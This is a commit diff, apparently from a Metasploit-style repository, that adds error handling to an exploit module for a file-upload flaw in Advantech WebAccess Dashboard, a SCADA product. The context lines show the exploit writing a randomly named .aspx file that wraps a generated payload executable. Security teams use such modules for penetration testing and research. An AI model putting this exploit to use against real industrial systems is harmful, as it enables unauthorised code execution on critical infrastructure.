Merge pull request #2 from open-security/advantech_webaccess_dashboard_file_upload

Advantech webaccess dashboard file upload
2016-04-19 12:59:32 +08:00 · 2016-04-19 12:59:32 +08:00 · 2400345fff
parent e59a91cddf 0407acc0ec
commit 2400345fff
1 changed files with 5 additions and 2 deletions
--- a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
+++ b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
      )
    end

-    ver = version_match(res.body)
+    ver = res && res.body ? version_match(res.body) : nil
    true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
  end

@ -112,7 +112,10 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    return unless vuln_version?
+    unless vuln_version?
+      print_status("#{peer} - Cannot reliably check exploitability.")
+      return
+    end
    filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
    filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)